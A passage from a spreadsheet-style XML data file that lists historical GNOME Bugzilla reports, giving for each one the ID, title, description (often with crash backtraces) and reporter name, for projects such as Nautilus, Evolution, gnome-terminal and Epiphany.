    <t>no doc/developer folder in gnumeric1.1.7.tar.bz2 download</t>
  </si>
  <si>
    <t>hal_ashburner</t>
  </si>
  <si>
    <t>NAUTILUS-129845</t>
  </si>
  <si>
    <t>Kill off useless gettext calls in check mode</t>
  </si>
  <si>
    <t>I've never seen less useful gettext calls.
regs
 Chris</t>
  </si>
  <si>
    <t>GGV-93181</t>
  </si>
  <si>
    <t>'Mark All Pages' button does not mark *all* pages in all cases.</t>
  </si>
  <si>
    <t>Build Details - Aug 27 CVS. Solaris Beta_2_Build_6 Package.
I did the following
1. Opened a 3 page document.
2. Used the marking buttons and marked odd pages. (Pg 1 &amp; pg 3).
3. Then USed Mark All button.
Expected result : All pages to be markedat least as per the image on that
button
Current Behaviour : 1 &amp; 3 get unchecked. And Page 2 gets marked.
This is not in sync with what the user expectation will be based on looking
at the buttons' images. 
Also there seems to be no tooltip/label describing these buttons.</t>
  </si>
  <si>
    <t>GNOME-APPLETS-154192</t>
  </si>
  <si>
    <t>the applet's volume does not change when adjusting it from alsamixer</t>
  </si>
  <si>
    <t>1.set the volume in the mixer applet to the maximum.
2.start gnome-terminal and launch alsamixer inside
3.change the volume of the by-mixer-applet-controlled channel to minimum.
now if you look at the mixer applet it still displays maximum volume.
it should display minimum volume.
also if you now adjust the volume in the mixer-applet you can see in the
alsamixer window that the mixer-applet sets the volume back to 'his' value
and adjusts that.
also if you move the volume up/down in the mixer applet you can see the bars
in alsamixer move. so alsamixer is able to 'listen' to those events from
mixer-applet.
want i'd like to have:
if i adjust the volume in alsamixer or in mplayer the mixer applet's
volume-value should get adjusted too.</t>
  </si>
  <si>
    <t>MEDUSA-41895</t>
  </si>
  <si>
    <t>medusa doesn't work well for people with home directories on nfs / other large fs</t>
  </si>
  <si>
    <t xml:space="preserve">users' home directories are not getting indexed and this is causing some
indexing processes to hang.
------- Additional Comments From rebecka@eazel.com 2000-08-02 19:37:21 ----
i think this can be solved here by two things:
1. use of the seteuid command to set the indexer to be able to read the nfs
mount in cases where it does not have access.
2. fixing the eventual permissions filtering to not automatically give back
root everything and use the search daemons status as root to do a direct
access call instead.
------- Additional Comments From rebecka@eazel.com 2000-08-02 23:08:46 ----
i added commands to find and skip nfs mount points for now.
we can do more in this vein if we realize we need to.
------- Additional Comments From darin@bentspoon.com 2000-08-03 10:11:55 ----
I changed the title to reflect the remaining problem. I consider this a
deferrable feature.
------- Additional Comments From bud@eazel.com 2000-08-23 19:10:24 ----
This would be required for any enterprise deployments.
I am marking After 1.0
------- Additional Comments From eli@eazel.com 2000-10-16 12:32:23 ----
Batch assigning Josh as the Quality Engineering contaact for Medusa bugs.
------- Additional Comments From victor@eazel.com 2001-02-15 15:11:45 ----
I'm not sure if this is serious enough to be considered a Must for 1.0 but it
is a very high want. It is very common for corporate users to have their home
directory in the server and nfs-mounted on their system. This is what we do here
at Eazel and I can't search my files. 
Does the medusa-indexd with the --folder= option serve as a workaround? 
Cheers Victor
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:34 -------
</t>
  </si>
  <si>
    <t>BEAGLE-165284</t>
  </si>
  <si>
    <t>International chars in Best hits</t>
  </si>
  <si>
    <t>A lot of my mail and documents contain Swedish chars and these are indexed
properly but not displayed correctly in Best. Instead something like fÃ¶r is
shown.</t>
  </si>
  <si>
    <t>jonas.klingstedt</t>
  </si>
  <si>
    <t>LSR-414994</t>
  </si>
  <si>
    <t>ReviewPerk peek tasks</t>
  </si>
  <si>
    <t>FirefoxPerk requires foresight into where the pointer will wind up after a review command is processed so it can give focus automatically check for document bounds register and unregister review keys etc. This foresight is currently gained by invoking the review perk tasks without chaining checking the pointer por then setting the pointer back to its original location and finally allowing the review perk to handle its command as it would have without the chained Firefox task interfering. This causes unwanted announcements as doTasks and their chains are not blocked during task execution.
Peek tasks in review perk will make dealing with this problem extremely easy.</t>
  </si>
  <si>
    <t>GAL-200321</t>
  </si>
  <si>
    <t>ECellText strikethrough should strike through entire cell</t>
  </si>
  <si>
    <t>strikethrough currently only affects the characters in a cell. It would be
nice if it struck through the whitespace in the cell as well
1) so empty cells are still marked
2) for visual consistency</t>
  </si>
  <si>
    <t>NAUTILUS-CD-BURNER-317068</t>
  </si>
  <si>
    <t>don't do *horrible* things to get the drive in burn extension</t>
  </si>
  <si>
    <t>Well since I've been publicly called out for smoking crack with the copy disc
implementation I suppose I'll have to fix it.  )</t>
  </si>
  <si>
    <t>EPIPHANY-680529</t>
  </si>
  <si>
    <t>wrong reference count in g_async_queue_unref calls on exit</t>
  </si>
  <si>
    <t>The ephy_history_service_execute_quit function is called twice when the browser is closed by user. First call is made from ephy_history_service_process_message when exit message is catched ephy_history_service_execute_quit will be called.
Second call is made from the run_history_service_thread function where there is a function call to ephy_history_service_execute_quit after a do-while message loop.
In both cases ephy_history_service_execute_quit is called and in the end g_async_queue_unref will be called for the same object.
Because of the wrong reference count reference object in the queue is already freed and it leads to an invalid access to the freed object.
In most of the case this is not a problem because it will not lead to a program crash or anything. In my case I was using different memory allocator than regular glibc allocator and that was the reason why I could catch this bug.</t>
  </si>
  <si>
    <t>sangkil.cha</t>
  </si>
  <si>
    <t>EVOLUTION-206423</t>
  </si>
  <si>
    <t>Crash on sending mail</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.12.99
Synopsis: Crash on sending mail
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
Compose a new message (clicking the 'Open a window for composing a new mail message' icon). Type the memo and click send cause a crash.
Debugging Information:
0x409f1519 in ?? ()
#0  0x409f1519 in ?? ()
#1  0x406af563 in ?? ()
#2  0x402dd262 in ?? ()
#3  0x08092db6 in address_compare (address1=0xb address2=0x7)
    at message-list.c:256
#4  0x406ad935 in ?? ()
#5  
#6  0x4079c273 in ?? ()
#7  0x406fd8ad in ?? ()
#8  0x4056fff0 in ?? ()
#9  0x4056f055 in ?? ()
#10 0x4056f659 in ?? ()
#11 0x4056f7e8 in ?? ()
#12 0x4048465b in ?? ()
#13 0x40798547 in ?? ()
#14 0x08092f60 in subject_compare (subject1=0x3 subject2=0xbffffa8c)
    at message-list.c:305
#15 0x40953177 in ?? ()
#0  0x409f1519 in ?? ()
No symbol table info available.
#1  0x406af563 in ?? ()
No symbol table info available.
#2  0x402dd262 in ?? ()
No symbol table info available.
#3  0x08092db6 in address_compare (address1=0xb address2=0x7)
    at message-list.c:256
	in message-list.c
address1 = 0x0
address2 = 0xfffffe00
#4  0x406ad935 in ?? ()
No symbol table info available.
#5  
No symbol table info available.
#6  0x4079c273 in ?? ()
No symbol table info available.
#7  0x406fd8ad in ?? ()
No symbol table info available.
Unknown reporter: adrian@haymarket.com.au changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>GNOME-TERMINAL-392378</t>
  </si>
  <si>
    <t>crash in Terminal: Adding a new profile</t>
  </si>
  <si>
    <t>Version: 2.16.0
What were you doing when the application crashed?
Adding a new profile
Distribution: Fedora Core release 6 (Zod)
Gnome Release: 2.16.0 2006-09-04 (Red Hat Inc)
BugBuddy Version: 2.16.0
System: Linux 2.6.18-1.2868.fc6 #1 SMP Fri Dec 15 17:29:48 EST 2006 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 70101000
Selinux: No
Accessibility: Disabled
----------- .xsession-errors ---------------------
	beagled-helper [0x4e48fa]
	beagled-helper [0x4ede92]
	beagled-helper [0x4e21c4]
	beagled-helper [0x4ec137]
	beagled-helper [0x4ed8b9]
	beagled-helper(mono_magic_trampoline+0x29) [0x43ec59]
	[0x4000013a]
Loading installonlyn plugin
** Message: sqlite cache needs updating reading in metadata
** Message: sqlite cache needs updating reading in metadata
** Message: sqlite cache needs updating reading in metadata
** (gnome-terminal:19429): CRITICAL **: terminal_profile_new: assertion `terminal_profile_lookup (name) == NULL' failed
** (bug-buddy:28114): WARNING **: Couldn't load icon for Open Folder
--------------------------------------------------
Memory status: size: 464924672 vsize: 464924672 resident: 27197440 share: 8916992 rss: 27197440 rss_rlim: -1
CPU usage: start_time: 1166639009 rtime: 10121 utime: 9130 stime: 991 cutime:2 cstime: 1 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/gnome-terminal'
(no debugging symbols found)
Using host libthread_db library /lib64/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 46912496366032 (LWP 19429)]
[New Thread 1084229952 (LWP 19434)]
(no debugging symbols found)
0x0000003bb660d96f in waitpid () from /lib64/libpthread.so.0
#0  0x0000003bb660d96f in waitpid () from /lib64/libpthread.so.0
#1  0x00000032d3c56d07 in gnome_gtk_module_info_get ()
   from /usr/lib64/libgnomeui-2.so.0
#2  
#3  0x000000000041ec44 in g_cclosure_marshal_VOID__OBJECT ()
#4  0x0000000000417ab7 in g_cclosure_marshal_VOID__OBJECT ()
#5  0x0000003bb820b16a in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#6  0x0000003bb821b3bd in g_signal_override_class_closure ()
   from /lib64/libgobject-2.0.so.0
#7  0x0000003bb821c826 in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#8  0x0000003bb821ca03 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#9  0x0000003bb820b16a in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#10 0x0000003bb821b3bd in g_signal_override_class_closure ()
   from /lib64/libgobject-2.0.so.0
#11 0x0000003bb821c826 in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#12 0x0000003bb821ca03 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#13 0x0000003aefe744a9 in gtk_button_set_alignment ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#14 0x0000003bb820b16a in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#15 0x0000003bb821b80d in g_signal_override_class_closure ()
   from /lib64/libgobject-2.0.so.0
#16 0x0000003bb821c826 in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#17 0x0000003bb821ca03 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#18 0x0000003aefe72d29 in gtk_button_released ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#19 0x0000003aeff3015d in gtk_marshal_BOOLEAN__VOID ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#20 0x0000003bb820b16a in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#21 0x0000003bb821b9dd in g_signal_override_class_closure ()
   from /lib64/libgobject-2.0.so.0
#22 0x0000003bb821c5ef in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#23 0x0000003bb821ca03 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#24 0x0000003af002d61e in gtk_widget_get_default_style ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#25 0x0000003aeff2984d in gtk_propagate_event ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#26 0x0000003aeff2a861 in gtk_main_do_event ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#27 0x0000003aefa4674c in gdk_add_client_message_filter ()
   from /usr/lib64/libgdk-x11-2.0.so.0
#28 0x0000003bb722cf44 in g_main_context_dispatch ()
   from /lib64/libglib-2.0.so.0
#29 0x0000003bb722fd7d in g_main_context_check () from /lib64/libglib-2.0.so.0
#30 0x0000003bb723008a in g_main_loop_run () from /lib64/libglib-2.0.so.0
#31 0x0000003aeff2abf3 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
#32 0x00000000004195b6 in g_cclosure_marshal_VOID__OBJECT ()
#33 0x0000003bb5a1da44 in __libc_start_main () from /lib64/libc.so.6
#34 0x000000000040f579 in g_cclosure_marshal_VOID__OBJECT ()
#35 0x00007fff4b552aa8 in ?? ()
#36 0x0000000000000000 in ?? ()
Thread 2 (Thread 1084229952 (LWP 19434)):
#0  0x0000003bb660cbfb in read () from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003bb722dab4 in g_main_context_wakeup ()
   from /lib64/libglib-2.0.so.0
No symbol table info available.
#2  0x0000003bb7248f24 in g_thread_create_full () from /lib64/libglib-2.0.so.0
No symbol table info available.
#3  0x0000003bb6606305 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#4  0x0000003bb5acd62d in clone () from /lib64/libc.so.6
No symbol table info available.
#5  0x0000000000000000 in ?? ()
No symbol table info available.
Thread 1 (Thread 46912496366032 (LWP 19429)):
#0  0x0000003bb660d96f in waitpid () from /lib64/libpthread.so.0
No symbol table info available.
#1  0x00000032d3c56d07 in gnome_gtk_module_info_get ()
   from /usr/lib64/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x000000000041ec44 in g_cclosure_marshal_VOID__OBJECT ()
No symbol table info available.
#4  0x0000000000417ab7 in g_cclosure_marshal_VOID__OBJECT ()
No symbol table info available.
#5  0x0000003bb820b16a in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#6  0x0000003bb821b3bd in g_signal_override_class_closure ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#7  0x0000003bb821c826 in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#8  0x0000003bb821ca03 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#9  0x0000003bb820b16a in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#10 0x0000003bb821b3bd in g_signal_override_class_closure ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#11 0x0000003bb821c826 in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#12 0x0000003bb821ca03 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#13 0x0000003aefe744a9 in gtk_button_set_alignment ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0x0000003bb820b16a in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#15 0x0000003bb821b80d in g_signal_override_class_closure ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#16 0x0000003bb821c826 in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#17 0x0000003bb821ca03 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#18 0x0000003aefe72d29 in gtk_button_released ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0x0000003aeff3015d in gtk_marshal_BOOLEAN__VOID ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x0000003bb820b16a in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#21 0x0000003bb821b9dd in g_signal_override_class_closure ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#22 0x0000003bb821c5ef in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#23 0x0000003bb821ca03 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#24 0x0000003af002d61e in gtk_widget_get_default_style ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#25 0x0000003aeff2984d in gtk_propagate_event ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#26 0x0000003aeff2a861 in gtk_main_do_event ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0x0000003aefa4674c in gdk_add_client_message_filter ()
   from /usr/lib64/libgdk-x11-2.0.so.0
No symbol table info available.
#28 0x0000003bb722cf44 in g_main_context_dispatch ()
   from /lib64/libglib-2.0.so.0
No symbol table info available.
#29 0x0000003bb722fd7d in g_main_context_check () from /lib64/libglib-2.0.so.0
No symbol table info available.
#30 0x0000003bb723008a in g_main_loop_run () from /lib64/libglib-2.0.so.0
No symbol table info available.
#31 0x0000003aeff2abf3 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#32 0x00000000004195b6 in g_cclosure_marshal_VOID__OBJECT ()
No symbol table info available.
#33 0x0000003bb5a1da44 in __libc_start_main () from /lib64/libc.so.6
No symbol table info available.
#34 0x000000000040f579 in g_cclosure_marshal_VOID__OBJECT ()
No symbol table info available.
#35 0x00007fff4b552aa8 in ?? ()
No symbol table info available.
#36 0x0000000000000000 in ?? ()
No symbol table info available.
#0  0x0000003bb660d96f in waitpid () from /lib64/libpthread.so.0</t>
  </si>
  <si>
    <t>david.joyner</t>
  </si>
  <si>
    <t>PAN-60412</t>
  </si>
  <si>
    <t>crash after re-download of articles of a newsgroup</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  pan
Severity: normal
Version:  0.9.5
Synopsis: crash after re-download of articles of a newsgroup
Class:    sw-bug
Distribuzione: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.2-2 i586 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core 1.2.4
Description:
After I re-download (the second time) the articles of a newsgroup
(it.comp.os.linux.iniziare) pan crash.
Excuse me but I'm a newbie so I can't tell you anymore.
Bye. :-)
Debugging information:
(no debugging symbols found)...
Program terminated with signal ? Unknown signal.
The program no longer exists.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-12 06:21 -------
The original reporter (nemoero@tiscalinet.it) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component charles@rebelbase.com.
</t>
  </si>
  <si>
    <t>nemoero</t>
  </si>
  <si>
    <t>NAUTILUS-41965</t>
  </si>
  <si>
    <t>[SERVER] Correct icons aren't being displayed for files on DAV servers</t>
  </si>
  <si>
    <t xml:space="preserve">Example:
*.rpm files on a DAV server don't have a RPM icon
------- Additional Comments From sullivan@eazel.com 2000-08-04 13:04:50 ----
Putting this in the demo milestone since I think we want the vault (which uses
WebDAV) to be demoable. If I'm wrong the milestone should be changed to
usable.
------- Additional Comments From darin@bentspoon.com 2000-08-04 16:16:21 ----
This is no surprise. Web servers think they know the MIME type of files but
they don't have the smarts that our MIME database does. Our design says that we
trust the web server rather than second-guessing it.
To fix this we'd have to change that aspect of the design.
------- Additional Comments From sullivan@eazel.com 2000-08-04 16:23:27 ----
We might want to reconsider this aspect of the design but it would be lunacy to
do so for the demo I think.
------- Additional Comments From mjs@noisehavoc.org 2000-08-04 16:41:01 ----
For demo purposes we can change this on the web server by making it report
proper mime types.
------- Additional Comments From mjs@noisehavoc.org 2000-08-04 16:54:28 ----
RPMs display fine on http://dav.eazel.com/dav/ so I am moving this out of demo
(and assigning to myself).
------- Additional Comments From sullivan@eazel.com 2000-08-10 09:53:06 ----
It looks like mjs intended to assign this to himself but didn't actually do so
then later Darin assigned it to me because it was unassigned. I'm giving it back
to mjs.
------- Additional Comments From mjs@noisehavoc.org 2000-08-11 01:01:22 ----
I am not even sure what we want to do for this. Need to come up w/ workable
design.
------- Additional Comments From mjs@noisehavoc.org 2000-09-01 22:41:45 ----
One possible design is to believe what the web server says unless it says
application/octet-stream in which case we should do our own detection based on
file extension magic sniffing etc
------- Additional Comments From mjs@noisehavoc.org 2000-09-04 03:15:21 ----
I bet someone else could do a better job on this than me (but if you take it
please leave it cc'd)
------- Additional Comments From gzr@eazel.com 2000-09-20 15:07:25 ----
See bug 43206 For specific example.
------- Additional Comments From bud@eazel.com 2000-09-28 01:44:57 ----
See bug 42521 for potential fix after PR2.
The general case requires some more thought and
ultimately may depend on a network service.
The action for this bug in PR2 should be the part of the
previous comment about ensuring that the Eazel WebDAV
server has a good set of MIME mappings
------- Additional Comments From mikef@praxis.etla.net 2000-10-02 10:39:20 ----
This is the same as bug 40239 in the application server database.  I'm going to
set this to No more time but keep it assigned to me.
------- Additional Comments From mikef@praxis.etla.net 2000-10-02 10:40:16 ----
*** Bug 43206 has been marked as a duplicate of this bug. ***
------- Additional Comments From mikef@praxis.etla.net 2000-10-02 10:40:24 ----
*** Bug 43206 has been marked as a duplicate of this bug. ***
------- Additional Comments From mikef@praxis.etla.net 2000-10-02 10:41:06 ----
Bug 43206 was closed as a dup of this bug but contains an equally worthwhile
comment discussion.
------- Additional Comments From mikef@praxis.etla.net 2000-10-03 14:34:46 ----
It looks like the intention on the server side is to do file-extention only mime
checking.  I hope this is enough for PR2.
------- Additional Comments From mikef@praxis.etla.net 2000-10-05 16:06:47 ----
I'm going to close this.  The Eazel Vault is now returning MIME types based off
of file extentions.
------- Additional Comments From eli@eazel.com 2000-10-16 19:57:29 ----
Batch-assigning QA ownership of remaining bugs to eli@eazel.com
------- Additional Comments From eli@eazel.com 2001-02-21 11:12:06 ----
QA Assigning to brett. Sorry for the spam.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:38 -------
</t>
  </si>
  <si>
    <t>GNOME-CORE-11326</t>
  </si>
  <si>
    <t>type 5 panel apears in the middle of screen</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.1.90
Synopsis: type 5 panel apears in the middle of screen
Class:    sw-bug
System: Linux 2.2.15 i686 unknown
C compiler: egcs-2.91.66
glib: 1.2.7
GTK+: 1.2.7
ORBit: ORBit 0.5.1
gnome-libs: gnome-libs 1.0.62
gnome-print: gnome-print-0.18
gnome-core: gnome-core 1.1.90
Description:
the new type 5 panel should apear on top of the desktop but instead it
apears in the middle of the screen and can't be moved.
I'm using XFree86 4.0.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:10 -------
This bug was previously known as bug 11326 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=11326
Originally filed under the gnome-core product and panel component.
Unknown version 1.1.x in product gnome-core. Setting version to the default unspecified.
The original reporter (ms@hotgreen.org) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>ms</t>
  </si>
  <si>
    <t>GLIB-153041</t>
  </si>
  <si>
    <t>output in gmessages.c</t>
  </si>
  <si>
    <t xml:space="preserve">File: glib-2.4.6/glib/gmessages.c
Function: mklevel_prefix ()
About g_log_default_handler () the glib doc says :
   stderr is used for levels G_LOG_LEVEL_ERROR G_LOG_LEVEL_CRITICAL and
    G_LOG_LEVEL_WARNING. stdout is used for the rest.
But in the source stderr is used also for G_LOG_LEVEL_MESSAGE (should not be).
static GFileDescriptor
mklevel_prefix (gchar level_prefix[STRING_BUFFER_SIZE] guint log_level)
{
    gboolean to_stdout = TRUE
    switch (log_level &amp; G_LOG_LEVEL_MASK) {
        ........................
    case G_LOG_LEVEL_MESSAGE:
        strcpy (level_prefix Message)
==&gt;     to_stdout = FALSE
        break
        ........................
}
Note as these levels where output is directed to stderr are designed by
ALERT_LEVELS it would be easier to remplace 'to_stdout' by something like:
        return ((log_level </t>
  </si>
  <si>
    <t>pblain</t>
  </si>
  <si>
    <t>GDM-50874</t>
  </si>
  <si>
    <t>gdm creates config files at install-time not configure-time</t>
  </si>
  <si>
    <t>Gdm is creating the files in config/ at install-time rather than
configure-time. The substitutions that go into the .in files (like
@bindir@) should be derived from their values when running ./configure.
This makes it so that you can't build gdm with the correct prefix etc and
install to a temporary directory for packaging. The temporary directory
gets written to the created config files which breaks gdm at run-time. I'm
attaching a patch.</t>
  </si>
  <si>
    <t>TOTEM-310663</t>
  </si>
  <si>
    <t>volume control keybindings wrong way around</t>
  </si>
  <si>
    <t>Distribution/Version: Ubuntu Breezy
1. Click on the new volume control widget.
2. Press + on the keyboard.
3. Observe volume decreasing.
4. Press - on the keyboard.
5. Observe volume increasing.
That should probably go the other way around.</t>
  </si>
  <si>
    <t>GIMP-318075</t>
  </si>
  <si>
    <t>improve gimp-image-is-dirty documentation</t>
  </si>
  <si>
    <t>Distribution/Version: debian sid/experimental
After saving an image with a Python script in gimp the image window still
thinks the image has changed since saving.
I will attach a simple script that makes a new image saves it and displays it
to show the problem.</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-316986</t>
  </si>
  <si>
    <t>Users and groups manager creates invalid password (amd64 specific!)</t>
  </si>
  <si>
    <t>Distribution/Version: Ubuntu Hoary/Breezy
Forwarded from: http://bugzilla.ubuntu.com/show_bug.cgi?id=10742
The password that gets set with the users and groups utility (from the System
menu) will not be the password you 
expect. It does not match the one you've typed into! 
Result: unknown password! 
Don't try reproducing this with an account you need to login with again! 
You can change the password fine with the KDE utility or passwd.
Another comment:
Found the same thing.  I could specify a manual password which it would
supposedly accept but then obviously ignore.  I could select to autogenerate a
random password - again it ignores this.  If you add a user then restart the
users and groups tool and look at the password - it is always reset to manual
(irrespective of previous setting) and password always has eight characters
(again irrespective of what was there before) and no way of finding out what it
has been set to.
As has been noted workaround is to set password through root terminal or similar.
I'm running hoary on amd64.</t>
  </si>
  <si>
    <t>GNOMEMM-139403</t>
  </si>
  <si>
    <t>Use Pango and Gdk classes for canvasmm</t>
  </si>
  <si>
    <t>2004-04-07  Bryan Forbes  
	* libgnomecanvas/src/canvas.hg: changed from using GdkRgbDither to
	Gdk::RgbDither.
	* libgnomecanvas/src/item.hg: changed from using GdkDrawable* to const
	Glib::RefPtr&amp;.
	* libgnomecanvas/src/text.hg: changed all C Pango properties to their C++
	counterparts.</t>
  </si>
  <si>
    <t>GPARTED-325969</t>
  </si>
  <si>
    <t>gparted not showing the partitions</t>
  </si>
  <si>
    <t>Please describe the problem:
gparted doesn't load any of the partitions
Steps to reproduce:
1.Put the Gparted CD in
2.Come to the interface
3.The rectangular box for browsing stays in that browsing mode.
4.The partitions don't get loaded
Actual results:
The partitions don't get loaded
Expected results:
The partitions should get loaded
Does this happen every time?
Every time
Other information:
on the console got this:-
MTRRIDC_DEL_ENTRY failed
0xd0000000
0x8000001 (errno 22) Sorry for previous bug filed mistake erase or disregard
it. Any more info. needed feel free to connect. There were other errors also but
didn't know how to save them. Jotted this one down.</t>
  </si>
  <si>
    <t>EVOLUTION-208528</t>
  </si>
  <si>
    <t>text doesn't gray correctly when it wraps.</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Cosmetic
Version: 0.12.99
Synopsis: Possibly a text bug
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
In a received e-mail when the &gt; character precedes text at the
beginning of a line it fades the text on that line out but if the
sentence continues onto another line and that line does not have a &gt;
character preceding it the text becomes the normal shade.  An example:
&gt; Speeds up to 56 Kbps*  (actual speeds var and depend on many  
factors)
The first line is shaded in the Evolution client while the second
isn't.  
Unknown reporter: pmunly@willamette.edu changed to bugbuddy-import@ximian.com.
</t>
  </si>
  <si>
    <t>pmunly</t>
  </si>
  <si>
    <t>GNOME-PYTHON-134785</t>
  </si>
  <si>
    <t>incomplete bindings for GNOME VFS</t>
  </si>
  <si>
    <t>The bindings for GNOME VFS library are incomplete. There is no methods for
operating on remote filesystem (reading or transfering files).</t>
  </si>
  <si>
    <t>GALEON-58010</t>
  </si>
  <si>
    <t>Java 2 plugin</t>
  </si>
  <si>
    <t xml:space="preserve">Package: galeon
Severity: major
Version: 0.11.2
Synopsis: Java 2 plugin
Bugzilla-Product: galeon
Bugzilla-Component: User interface
Description:
Galeon crashes with a seg fault every time I tru and download the java 2 plugin from the netscape site
URL is homr.netscape.com/plugins/jvm.html
I click the button to download the linux version and a dialog pops up.
It then crashes.
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...0x40839c09 in wait4 () from /lib/libc.so.6
#0  0x40839c09 in wait4 () from /lib/libc.so.6
#1  0x408abd84 in __check_rhosts_file () from /lib/libc.so.6
#2  0x4062b683 in waitpid () from /lib/libpthread.so.0
#3  0x401ad262 in gnome_segv_handle (signum=11) at gnome-init.c:659
#4  0x406293cb in sigaction () from /lib/libpthread.so.0
#5  0x407ac708 in killpg () from /lib/libc.so.6
#6  0x08083ef0 in GaleonWrapper::GetMouseEventContext () at eval.c:41
#7  0x08092965 in mozilla_get_mouse_event_info () at eval.c:41
#8  0x08090875 in mozembed_dom_mouse_down_cb () at eval.c:41
#9  0x402f3c21 in gtk_marshal_BOOL__POINTER (object=0x82108c0 
    func=0x80907d0  func_data=0x8415058 
    args=0xbfffc580) at gtkmarshal.c:28
#10 0x4032356a in gtk_handlers_run (handlers=0x8285918 signal=0xbfffc520 
    object=0x82108c0 params=0xbfffc580 after=0) at gtksignal.c:1917
#11 0x403229bb in gtk_signal_real_emit (object=0x82108c0 signal_id=151 
    params=0xbfffc580) at gtksignal.c:1477
#12 0x40320a30 in gtk_signal_emit (object=0x82108c0 signal_id=151)
    at gtksignal.c:552
#13 0x40034305 in EmbedEventListener::MouseDown () at eval.c:41
#14 0x40c56b84 in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#15 0x4101a58f in NSGetModule () from /usr/lib/mozilla/components/libjsdom.so
#16 0x41002f4e in NSGetModule () from /usr/lib/mozilla/components/libjsdom.so
#17 0x40d3dc42 in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#18 0x40d2b09f in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#19 0x40d2b06f in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#20 0x40d2b06f in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#21 0x40d2b06f in NSGetModule ()
   from /usr/lib/mozilla/components/libgkcontent.so
#22 0x412d9818 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
#23 0x412d9643 in NSGetModule ()
   from /usr/lib/mozilla/components/libgklayout.so
